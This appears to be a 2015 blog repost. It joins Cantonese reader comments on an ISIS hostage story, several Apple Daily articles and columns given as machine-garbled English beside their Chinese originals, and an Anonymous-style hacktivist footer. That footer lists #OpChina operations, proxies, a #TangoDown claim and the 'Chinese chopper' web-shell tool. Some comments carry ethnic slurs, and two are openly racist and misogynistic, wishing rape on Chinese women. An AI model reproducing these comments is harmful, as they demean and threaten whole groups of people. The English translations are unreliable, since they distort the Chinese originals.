1天前
Kwong Sang Tse]-
上兩個月 , 共產黨先至花咗幾千萬 ,
贖咗一個單車客 , 而家又嚟一個 ?
中國人口咁閪多 , 贖得幾多個 。
仲有 , 隨時有班死仆街與 Is 扯貓尾 , 扮被人綁架。
今次發達囉 !
回覆/分享
11/0

24小時之前
Keyman Chan]-
精密分析,讚 !
回覆/分享
3/0

1天前
Sky Kit
中國出兵打七佢啦,講咁撚多都無撚用,
回覆/分享
9/0

24小時之前
Keyman Chan]-
中共打自己人就 十個叻 !
回覆/分享
2/0

1天前
Ka Wong]-
底死
回覆/分享
3/5

1天前
Ss Wq]-
其实上次被绑架的中国人已经被救回来。
国内媒体是报喜不报忧
苹果日报是报忧不报喜
哈哈哈哈....
回覆/分享
4/3

1天前
Charles Woo]-
人民解放軍呢?導彈呢?去左邊呀?
唔係話可以射到去美國咩?
應該剩係攞嚟展覽,得閒叫普京嚟共賞...!!
回覆/分享
13/0

1天前
Sky Kit]-
無彈頭的導彈,中國假野多,信唔過,同北韓一樣
回覆/分享
5/0

1天前
Samsan Ng]-
大陸吾係未試過,當年甲午之戰,鄧世昌咪咁死囉!
回覆/分享
3/0

1天前
民 陳]-
黨國天朝話自己有隊比紙老虎美帝的海豹還要利害的部隊,
 點解還不去救人, 莫非又是"吹水部隊.".
回覆/分享
13/0

1天前
Roy Chan]-
捉番佢d聖戰士,問佢地要唔要...??
回覆/分享
7/0

1天前
Timothy Wun]-
未暴力救巿之前,或者仲有閒錢贖你。
依家,你 ISIS 唔俾錢我中共國,咪駛旨意推番個人俾我,嘥我米飯。(Well..! I added hahahaha...)
回覆/分享
6/0

1天前
Sheamus Leung]-
香港人と台湾人と中国人も支那人でしょう?まったく低下物種と思う
回覆/分享
1/11

1天前
Sheamus Leung]-
IS最好聯手大日本帝國,, 攻陷華夏大地 到處強姦妳地中國女人 中國女人係全世界最低賤雌性生物 ..下邊痕... 搏命求高貴日本人插入... 可惜日本人係唔會同動物做囉!
回覆/分享
1/13

22小時之前
_ 巴麻美]-
跪求翻譯器網址
回覆/分享.1

20小時之前
Yi Xiong]-
佢姓梁,你话係咩人

20小時之前
Yi Xiong]-
日本人沒你梗冇礼貌的!仲有你姓中國姓喎!

1天前
吹毛 斷髮]-
大陸撚嚟嘅喂,ISIS呢次蝕米飯啦,今鋪真係“捉蟲”啦…
回覆/分享
8/1

1天前
河 黄]-
 “今鋪真係“捉蟲”啦”;形容得妙!
回覆/分享
3/0

1天前
Justin Fong]-
又話如果冇軍人 我們只是精蟲 而家有軍人 又有人民幣 點解變左人質
回覆/分享
9/0

1天前
Ling Fun]-
支那人一啲都唔會可憐!
回覆/分享
2/1

1天前
Jarrod Xiao]-
你到撚底知唔知支那人個名點嚟?!有幾侮辱?又知唔撚知邊D人種叫支那人?!check your last name again asshole! You are one of them!! Google the word first before you comment you piece of shit!
回覆/分享
5/1

1天前
得意 陳]-
真得意,從來IS都唔敢挷架俄羅斯國民!
回覆/分享
7/0

1天前
Wong Ronald]-
其實俄羅斯好撚窮..! haha...

=====

 http://hk.apple.nextmedia.com/realtime/china/20150910/54189268

Black smelly salted egg yolk cross workshops give her restaurant do moon cake

 
 Marinated black workshop 200,000 smelly salted, manufacture moon cake sent to the restaurant.

  launch moon cake should be the city. Shenzhen recently seized an unlicensed food factory black, unscrupulous traders to store 200,000 pairs salted in Tuen village a rental, ready for delivery to local restaurants and markets and Dongguan each moon cake production.

Complaints from residents within a rented, often heard stench. When law enforcement officers broke into the flat and found the area less than 1,000 square feet of the house, window seals, the wall is filled with rows being pickled salted egg yolk. After it was reported that workers will duck wash and peel, put the egg yolk directly on the plastic box, and then sent to the moon cake making Shenzhen a restaurant. Currently, relevant departments are tracing the origin and destination of these raw materials.

The black factory responsible person, but to assist in Dongguan blessing of the Hong Egg Co., Ltd. for processing, the curing process, the salted egg yolk removed, at least 50,000 yuan profit after processing. Law enforcement officers at the scene after evidence, all of these issues salted taken away for further examination. Because people can not be responsible for providing a business license or permit, the authorities in accordance with the relevant laws and the goods will be seized, and the place closed down.

 

 ===
 http://hk.apple.nextmedia.com/realtime/china/20150910/54189268

黑工場醃發臭鹹蛋黃 交畀酒樓做月餅

 
 中秋節將至,各大品牌的月餅爭相推出應市。深圳近日查獲一個無牌食品黑工場,無良商人在中屯新村一間出租屋存放20萬雙鹹蛋,準備送往當地及東莞各酒樓和街市製作月餅。

居 民投訴一間出租屋內,經常傳出惡臭。當執法人員破門入屋時,發現該面積不到1,000平方呎的屋內,窗戶密封,牆邊則堆滿一排排正在醃製的鹹蛋黃。據報, 工人將鴨蛋清洗和剝殼後,便將蛋黃直接放在膠箱內,然後送往深圳一間製作月餅的酒樓。目前,相關部門正追查這些原材料的來源和去向。

該黑 工場的負責人稱,只是協助東莞的福之康蛋品有限公司進行加工,從醃製過程中,將鹹蛋取出蛋黃,加工後至少可獲利5萬元人民幣。執法人員在現場取證後,將這 些問題鹹蛋全部運走,作進一步檢驗。由於負責人無法提供營業執照或許可證,當局根據有關法律將有關貨品予以扣押,並將該場所進行查封。
 

 =====
 http://hk.apple.nextmedia.com/realtime/china/20150910/54190379

WISCO Ironworks workers inhaled gas poisoning stuffed 2 dead

 
 Scene (Internet).
 Wuhan Iron and Steel Group Company workshop, today at 12 am gas poisoning accident occurred, resulting in two deaths and six people after inhalation of gas unwell.

Wuhan Iron and Steel Group, said that before the incident, Wuhan four ironworks blast furnace due to clogged sink, arrangements led to two cleaners engineer Alan Li Bao (44 years old) and 曹方庆 (47 years old) went to clean up. Since the area is still residual gas clean-up operations, killing two cleaners poisoning, sent to hospital after the rescue died.

At the same time participate in a live rescue six workers due to inhalation of a small amount of gas and discomfort, it is now in hospital under observation. Wuhan Iron and Steel Group is cooperating with the relevant departments of the accident investigation and rehabilitation work.

WASHINGTON


 ===
  http://hk.apple.nextmedia.com/realtime/china/20150910/54190379

武鋼煉鐵廠工人 吸入煤氣中毒釀2死


 事發現場(互聯網).
 湖北武漢鋼鐵集團公司廠區,今日中午12時許發生煤氣中毒事故,導致2人死亡,6人吸入煤氣後身體不適。

武鋼集團表示,事發前,武鋼煉鐵廠四高爐水槽因雜物堵塞,安排工程師帶領兩名清潔工李福保(44歲)及曹方慶(47歲)前往清理。由於清理作業區域仍殘留煤氣,造成兩名清潔工中毒,送院搶救後不治。

同時參與現場救援的6名職工,因吸入少量煤氣而身體不適,現正留院觀察。武鋼集團正配合相關部門,對此次事故進行調查,並進行善後工作。
 

 =====
 http://hk.apple.nextmedia.com/realtime/china/20150911/54190621
Handan City in Hebei Vocational Education Center instructors, armed with steel pipes Tuesday beating students, about 20 students were injured, have been sent to hospital for treatment. Students injured, said the schools to implement paramilitary management, instructors outside the hostel verbal conflict with him, beat him and then hold pipe into the dormitory of violence against innocent students. Police said the four beat instructors have been in administrative detention. Local Department of Education investigation.

Internet users in the microblogging burst, then in the dormitory, instructors drunk, armed with steel pipes playing high school students, "the students do not know where they went, using a steel pipe! And lock the dormitory door, shut the dormitory lights!" Another Some netizens refers to the instructor and a student at the time, "mixing the sentence mouth, instructor copy stick hit the dorm." Later, the instructor took the pipe and stick the second floor shouting, shouting, said: "Come, the third year is not Cattle X it? all out! "

 



 ===
 http://hk.apple.nextmedia.com/realtime/china/20150911/54190621



河北邯鄲市職教中心教官,周二手持鋼管毆打學生,約20名學生受傷,已被送院接受治療。受害的學生稱,該學校實行準軍事化管理,教官在宿舍外與他發生言語 衝突,毆打他後又持鋼管衝入宿舍對無辜同學施暴。警方稱,4名打人教官已被行政拘留。當地教育局已介入調查。
http://static.apple.nextmedia.com/images/e-paper/20150910/large/1441896101_34fa.jpg
網民在微博爆出,當時在宿舍 內,教官喝醉了酒,手持鋼管打高三學生,「不知道學生犯了甚麼錯,用的是鋼管!並且鎖上宿舍門,關上宿舍燈!」另有網民指,當時教官與一名學生「拌了句 嘴,教官抄棍子在宿舍門口就打。」後來,教官又拿着鋼管棍子上2樓叫囂,大聲喊說:「來,高三的不是牛X嗎?都出來!」
 

 =====
 http://www.appledaily.com.tw/realtimenews/article/new/20150909/687730/

Russia too suspicious "humanitarian" military aircraft route through Bulgaria rejected







Russian transport aircraft flying over the Red Square in Moscow. Agence France-Presse.
 on September 9, 2015.
 To keep ally Assad (Bashar al-Assad) regime, Russia's military intervention in the Syrian civil war suspected. Just outside a questioning voices, the Bulgarian Foreign Ministry on Tuesday (8th) announced refusal "claiming" humane load supplies Russian military transport aircraft, by way of Bulgaria's airspace to Syria, the authorities denied that it was under pressure from NATO partners, on the grounds that intelligence agencies to obtain information sufficient for the type of aircraft was carrying suspicious materials.

The Greek Government refers, recently the United States had asked them, reject Russia's airspace to Syria aircraft route through Greece, but Greece has not yet decided whether to agree to this request.

Syrian state television recently broadcast the film, to take Russian soldiers and armored vehicles advanced in Latakia province (Latakia) and the Syrian army "fought", as well as soldiers, speaking in Russian. And "base" of the Syrian branch of the relevant users also push the special share, the Russian fighter planes and drones flying over Iraq was 利卜 photo Syrian province (Idlib) of. All the evidence so that the public strongly suspect that Russia's military intervention in Syria civil war. (International Center / Dow Jones reports)






In 2012, it declared a Russian transport plane carrying medical supplies landed at Damascus airport. Reuters.


 http://www.appledaily.com.tw/realtimenews/article/new/20150909/687730/












太可疑 俄「人道」軍機借道保加利亞被拒

俄羅斯運輸機飛越莫斯科紅場上空。 法新社.
 2015年09月09日.






 http://hk.apple.nextmedia.com/realtime/news/20150909/54185678

[First] read as fast mind 

The Famous writer(Yi Li).

 
 Hong Kong is the Hong Kong team fans cheer before the Hong Kong team in the match against Qatar.
 Hong Kong team against Qatar, a prelude to the national anthem during the Games, fans call in unison, "We are Hong Kong" cover music. This action, with a profound symbolic significance.

From 97 before the "God Bless me king" to the Chinese national anthem, which means the transfer of sovereignty of Hong Kong, the British colony of Hong Kong from Hong Kong into China. In "We are Hong Kong" to cover up the national anthem, meaning that does not recognize the sovereignty transfer, that does not admit that this is Hong Kong's "national anthem." Although there is no recovery colonial implications, at least indicates that only accepts "We are Hong Kong", Hong Kong, China does not accept us.

This is certainly not the reality. But the reality is one thing, whether to accept the Hong Kong people in mind is another matter. Pro-communist attitude of Hong Kong people who often do not "return" as a reason, and therefore can not give Hong Kong people expressed no screening elections. However, the more we want to control Hong Kong, Hong Kong people do not accept the control of the exhibit. Why after 97 years are not so obvious, "We are Hong Kong," the voice, and in particular in power after the beam has to happen? The answer is: not only the mentality of Hong Kong "did not return," but because of the hard push Hong Kong Fusion Hong Kong mentality leaving anti increasingly "isolated" also. "We are Hong Kong" Hong Kong people to express the voice of the independent identity. (Full text will be published tomorrow Apple forum)

 Chase real thing burst size city that like Apple [site] FB!
 ===
 http://hk.apple.nextmedia.com/realtime/news/20150909/54185678

【先讀為快】心態
*著名作家*(李怡).


 香港球迷日前在港隊對卡塔爾的比賽中為港隊打氣。
 港隊迎戰卡塔爾,賽前奏國歌時,球迷齊聲呼叫「We are Hong Kong」掩蓋樂聲。這一行動,帶有深刻的象徵意義。

從97前的《天佑我王》轉為中國國歌,意味香港主權的移轉,即從英國殖民地香港轉為中國香港。以「我們是香港」來掩蓋國歌,意思就是不承認這個主權移轉,即不承認這是香港的「國歌」。儘管沒有恢復殖民地的含意,至少表示只接受「我們是香港」,而不接受我們是中國香港。

這 當然並非現實。但現實是一回事,香港人在心態上是否接受就是另一回事。親共人士常以港人心態未「回歸」為理由,表示因此不能給港人沒有篩選的普選。不過, 越是要控制香港,香港人越表現出不接受控制。為甚麼97後多年都沒有這麼明顯的「We are Hong Kong」的呼聲,而在梁特主政後卻出現呢?答案是:不僅港人心態「未回歸」,而且因硬推港中融合而使港人心態反趨「分離」也。「We are Hong Kong」的聲音表達港人自主的身份認同。(全文將於明日蘋果論壇刊出)


追實城中突發大小事,即 like 蘋果【現場】FB!
 =====
 http://hk.apple.nextmedia.com/news/art/20150911/19290835


Xi Jinping × Bon Jovi × Dalai Lama (senior hedge fund manager Qian Jian)

 
  American singer Bon Jovi concert in mainland China a few days ago suddenly "canceled." Profile picture.
 Jon Bon Jovi is American rock singer, born in 1962, the band name is called Bon Jovi. Your playing online Keywords: "Bon Jovi Teresa Teng", that Bon Jovi Teresa plus two days late Formosa keywords, you'll see a YouTube clip, August in front of the Chinese Lantern Festival song interpretation issued: Rock man Bon Jovi to sing with brackish Mandarin "The Moon Represents My Heart", you know Bon Jovi more than a "determination" into the Greater China market.  
Last September there are shops in Macau, the band will also go to Singapore and Taiwan. Less than a few days ago, Bon Jovi band was scheduled in the mainland 14 and 17 in Shanghai and Beijing concert announced "be canceled," the suspected cause of death was a few years ago the band concert in Taiwan, the Tibetan spiritual leader the Dalai Lama appeared Portrait of Lama. 达 赖肖 words like "appear" in Taiwan, is the 2010 past; habit 70 years Total War Victory parade before the big show is completed, the United States and Western countries face Chinese parade Well give me big show, Bon Jovi actually ban if the United States small ring? Do Chinese leaders in Beijing do not want to have the opportunity to enjoy the famous rock band Bon Jovi sang the song "The Moon Represents My Heart"? Music is the universal language, to care for him whether the Dalai Lama followers Jon Bon Jovi, Bon Jovi a chance to sing in the mainland, perhaps you can relieve the current tension in Sino-US relations and cross-strait three places.

CPC Caichang prohibit bands Bon Jovi is certainly leave fans disappointed; bigger reason, also with the Chinese invasion of Tibet 64 years, the 50th anniversary of the establishment of the Tibet Autonomous Region of sensitive day, can not make "support Tibet" foreign sounds can be presented. Among the world's six million Tibetans, about one hundred thousand exile.  
Two months ago I was in Toronto, Canada, is a descendant of the Tibetans in exile have seen their own experiences. When the Chinese Communist Party slogan "liberation of Tibet", speak beautiful, in fact, he made a cross-generational type of brainwashing and cleaning cultural behavior, so that traditional Tibetan culture can not generations. Hong Kong people are very tin body, but Tibetans to self-immolation (Self-Immolation) sacrifice power to express discontent.
The Dalai Lama was born in 1935 just 80 birthday, he can return to Tibet very little chance, "chivalrous fight" the opportunity to engage in independent is almost zero, Tibetans basically longing in "People's Republic of China Constitution" get real National Autonomous rather than shake, why should the Communist Party of China safeguard stability violence, violent repression of Tibetan religion, culture and people's livelihood and the size of things, really puzzling.

China continued outflow of funds

Tibet's government in exile stationed in India, the government has since 2000 produced directly elected by the people, ancient religious heritage of democracy also up, the Chinese Communist Party since the founding of New China in 1949 to the present, there is no catch up with the pace of democracy? The topic of the extension, corruption and abuse of power CCP officials, so Xi Jinping actively "fight corruption", but mainland officials do not have a reporting mechanism underlying causes, to review any final just vain.
Xi Jinping parade Sao spend over twenty billion yuan, parade day "touched" many people, but a few months since China financial market bailout is not violent, violent devaluation even more people turn crazy dollars in different channels, whether or not China has become out of control? My half-cooked naturalization of democracy in Hong Kong at the turn of the Samsung Communists said to me, Madam President Xi Jinping bailout rescue party violence can not conceal that China is now a very turbulent political and economic body, the Mainland large groups of people also lost confidence in the regime.  
China will continue to drain funds, impractical rapid economic development should be attributed to reality.
Finally, we have a talk in Hong Kong. Barrister Alan Leong with noble sentiments involved umbrella campaign last year, recently withdrew schematically 2016 Legislative Council election, I would like Mr Liang Hong Kong people continue to sound in the penultimate day. Also, the democratic tradition, as the late Mr. SZETO said: "I do not have success." Modern state leaders may be too violent Salvation, a solemn commitment to the One Country Two Systems, Hong Kong is also infinitely re-interpretation.
The late Chinese leader Deng Xiaoping said: "The implementation of one country two systems, anyone who is not a good swallow." From the situation in Tibet over the past 60 years, look at today's Hong Kong: culture, religion, universal values ​​destroyed It is indeed difficult to peace!

Qian Zhijian senior hedge fund manager

 Chase real thing burst size city that like Apple [site] FB!
===
 http://hk.apple.nextmedia.com/news/art/20150911/19290835

習近平×Bon Jovi×達賴喇嘛
(資深對沖基金經理 錢志健)

 
 美國歌手Bon Jovi在大陸的演唱會日前突然「被取消」。資料圖片.

Jon Bon Jovi是1962年出生的美國搖滾樂歌手,樂隊名稱叫做Bon Jovi。你上網打關鍵字:「Bon Jovi Teresa Teng」,即Bon Jovi加上已故寶島天后鄧麗君兩組關鍵字,你會見到一段YouTube短片,八月時在中國元宵佳節前發放的歌曲演繹:Rock佬Bon Jovi用半鹹淡國語唱出《月亮代表我的心》,就知道Bon Jovi多有「決心」打入大中華市場。九月尾在澳門有店,樂隊亦都會去到新加坡及台灣。
不足數天前,Bon Jovi樂隊原定在大陸14及17號在上海及北京的演唱會宣佈「被取消」,疑似死因就是數年前樂隊在台灣開演唱會時,出現了西藏精神領袖達賴喇嘛的肖像。 話說達賴肖像在台灣的「出現」,已是2010年的往事;習總抗戰勝利70年閱兵大騷才完畢,美國及西方國家唔畀面中國閱兵大騷,禁止Bon Jovi其實是否對美國的小戒?難道中共領導人不想有機會在北京欣賞著名搖滾樂隊Bon Jovi高唱一曲《月亮代表我的心》?音樂是共通語言,理他Jon Bon Jovi是否達賴信徒,給Bon Jovi一個機會在內地演唱,或許可以紓緩現時緊張的中美及兩岸三地關係。

中共踩場禁止Bon Jovi樂隊演出固然令歌迷失望;更大的原因,也是配合中國入侵西藏64年,西藏自治區成立50周年的敏感日子,不能令「撐藏」的外國聲音可以呈現。全世 界六百萬藏人當中,大約有十多萬流亡海外。兩個月前我在加拿大多倫多,就是見過流亡西藏人後裔的現身說法。當年中國共產黨口號的「解放西藏」,說話亮麗, 其實做了跨世代式的洗腦及清洗文化行為,令西藏傳統文化不能夠世代傳承。
香港人十分錫身,西藏人卻以自焚(Self-Immolation)的犧牲表達對 強權的不滿。1935年出生的達賴喇嘛剛80大壽,他能重返西藏的機會微乎其微,「勇武抗爭」搞獨立機會更是近乎零,西藏人基本上也是嚮往在《中華人民共 和國憲法》下得到真正的民族自治而不是被換血,中國共產黨為何還要暴力維穩、暴力鎮壓西藏的宗教、文化以及民生大小事,實在令人費解。

中國資金繼續外流

西藏的流亡政府長駐印度,政府也自2000年由人民直選產生,古老的宗教傳承也民主起來,中國共產黨自1949年成立新中國到現在,民主步伐有沒有趕上? 把話題延伸,中共官員的貪腐與濫權,令習近平積極「打貪」,但內地官員沒有一個治標治本的申報機制,任何的檢閱最終只是白費心機。習近平閱兵騷花費超過二 百億人民幣,閱兵當日「感動」無數人,但中國自數月前金融市場暴力救市不成、暴力貶值人民幣更令國人用不同渠道瘋狂轉美金,中國是否已變得失控?我的半生 熟歸化民主的香港三星共產黨員之交對我說,習近平主席暴力救市救黨也不能掩飾中國現在是極動盪的政治及經濟體,很大群體的內地人也對政權失去信心。中國資 金會繼續外流,假大空的高速經濟發展也要歸於現實。

最後,也要一談香港。大律師梁家傑議員以高尚的情操參與了上年雨傘運動,日前示意退下2016 立法會選舉,願梁議員在倒數的日子繼續為我香港人發聲。還有,民主的傳承,正如已故司徒華先生所說:「成功不必在我」。現代國家領導人或許太暴力救國,對 香港一國兩制的莊嚴承諾也無限地重新解讀。已故中國領導人鄧小平先生也說:「推行一個國家兩種制度,誰也不好吞掉誰。」從西藏過去60多年的處境,再看現 今的香港:文化、宗教、普世價值的摧毀,實在令人難以安寧!

錢志健
資深對沖基金經理


追實城中突發大小事,即 like 蘋果【現場】FB!
 

 =====



  (# today Hong Kong  - tomorrow Taiwan) - #opchina  #OPHK  #OpISIS  #OpRussian  #Op_Tibet  #optaiwan ))- >> Anonymous is omnipotent << -

 ============>.<=============

 *---update [12 / 09-2015] dynamic DNS update client (DUC) for Windows ,, keep your current IP address and no IP host or domain name you sync with our dynamic update client (DUC).By-http://changyang319.com(TW).&- KPROXY- Free Anonymous Web Proxy -Anonymous Proxy"- &- [ http://tools.rosinstrument.com/proxy/ ]--5 Best Free VPNs-
---update[12/09-2015]動態DNS更新客戶端(DUC)的Windows,,保持你當前的IP地址與你無IP主機或域名與我們的動態更新客戶端(DUC)同步。By-http://changyang319.com(TW).-&- KPROXY - Free Anonymous Web Proxy -&
-http://tools.rosinstrument.com/proxy/ ]- Anonymous Proxy"--5 Best Free VPNs-**All The World Lauguage**--

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
 - Update[11/09-2015] seek knowledge regardless of geographical, see expert analysis (1)."oldest" Koran fragment "- the Russian people to learn,, is in how it forms and tutorials ?(2).Judgments about information security. sage and teacher Yin Fu in [part.1], recorded by his disciple s.- (3).from our chivalrous Anonymous fire@cat's blog, he gives us a software tool, this tool name called "Chinese chopper", which we are curious strange name, so we use our Great God Google search ..freebuf.com ..! -
-更新[11/09-2015]尋求知識不分地域,看專家分析(1)."最古老的“古蘭經片段"-俄羅斯人們的學習,,是在怎樣的形式和教程的呢?(2).Judgments關於信息安全。至聖先師尹福在【系統Part.1],記錄了他的弟子們..!.-(3).從我們的俠義匿名fire@cat的博客中,他給我們一種軟件工具,這工具的名字稱為"中國菜刀",這陌生的名字我們感到好奇,於是便運用我們的谷歌大神搜索了..freebuf.com..!-
- Update [11/09-2015] suchen, Wissen unabhängig von geographischen, siehe Expertenanalyse (1) "älteste" Koran-Fragment. "- Das russische Volk zu lernen, ,, ist, wie es bildet und Tutorials (2)....!-
- アップデート[11/09から2015]専門家の分析(1)"最古"コーランフラグメント」を参照してくださいに関係なく、地理の知識を求めて - (2)について.Judgments,,...!-**All The World Lauguage**-

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
- Update [11-09-2015] Our favorite Apple Daily Forum famous writer " Mr. Li Yi ", portrays the voice of Hong Kong's 7 million citizens! -& By the hackread.com/anonymous-ghostsec-attacing-isis/ ]-&- By-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina
-更新[11-09-2015]我們最喜愛的蘋果日報論壇著名作家李怡先生,描寫出了香港7000000市民的心聲!-與hackread.com/anonymous-ghostsec-attacing-isis/ ]-與由-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina ]-**All The World Lauguage**-

http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
 ---Update [10/09-2015] from Taiwan Disp Technology -Disp BBS (facebook) Kanban - Author: zxc5867146] - and internet friends Chat online '' kanban '' - [Note: We really very like and enjoyed ^^] - the next is we very favorite that politics, current events in Hong Kong's Apple Daily reported and Appledaily.com.tw Oh! - (# today Hong Kong  - tomorrow Taiwan) - #opchina  #OPHK  #OpISIS  #OpRussian  #Op_Tibet  #optaiwan ))- >> Anonymous is omnipotent << -
---更新[10/09-2015]由台灣Disp Technology -Disp BBS (facebook)看板-作者: zxc5867146]-與網友的Chat ''看板''-[註:我們非常喜歡^^]-接下來便是我們愛看政治,時事新聞的香港 蘋果日報的報導和Appledaily.com.tw喔!-(#今日香港-明日台灣)- #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan ))- >>匿名是無所不能<< -
---Update [10 / 09-2015] aus Taiwan Disp Technologie -Disp BBS (facebook) Kanban - Autor: zxc5867146] - und Internet-Freunde Chat online '' Kanban '' - [Anmerkung: Wir sind wirklich sehr ähnlich und haben ^^] - der nächste ist, dass wir sehr beliebt, dass die Politik, aktuelle Ereignisse in Hongkong Apple Daily berichtet, und Appledaily.com.tw Oh! - (# Heute Hong Kong - morgen Taiwan) - #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan)) - >> Anonymous ist allmächtig <<-
---台湾DISP技 術-Disp BBSから更新[10/09から2015](Facebookの)かんばん - 著者:zxc5867146] - 、インターネットの友人オンライン ''かんばん」をチャット ' - [注:私たちは実際には非常に好きで、楽しんだ^^ ] - 次は政治が、香港の蘋果日報の現在のイベントが報告され、Appledaily.com.twああことを我々は非常にお気に入りです! - (#今日香港 - 明日台湾) - #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan)) - >>匿名<<全能であります -**All The Wold Country Lauguage**- 
 

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
 ===Melody.Blog===FOLLOW   FOLLOW===>/